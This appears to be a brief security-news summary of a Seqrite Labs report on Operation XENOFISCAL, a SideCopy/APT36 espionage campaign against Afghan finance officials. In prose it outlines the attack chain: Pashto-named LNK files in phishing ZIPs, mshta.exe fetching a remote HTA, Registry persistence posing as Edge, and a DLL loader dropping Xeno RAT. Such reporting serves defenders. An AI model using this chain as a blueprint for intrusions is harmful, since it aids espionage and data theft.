Seqrite Labs has documented Operation XENOFISCAL, a campaign by the Pakistan-linked SideCopy group (under the Transparent Tribe / APT36 umbrella) targeting Afghanistan's Ministry of Finance, provincial revenue and finance directorates, and Pashto-speaking government officials. The attack opens with spear-phishing delivering a ZIP archive containing a malicious LNK file bearing a Pashto-language filename - a deliberate choice reflecting familiarity with Afghan government circles. The LNK uses mshta.exe to fetch a remote HTA from a compromised Afghan education domain, running obfuscated in-memory JavaScript. It establishes Registry persistence mimicking Microsoft Edge and drops Xeno RAT 1.8.7 plus a decoy document via a DLL loader. Xeno RAT supports keylogging, screenshots, and SOCKS5 tunneling.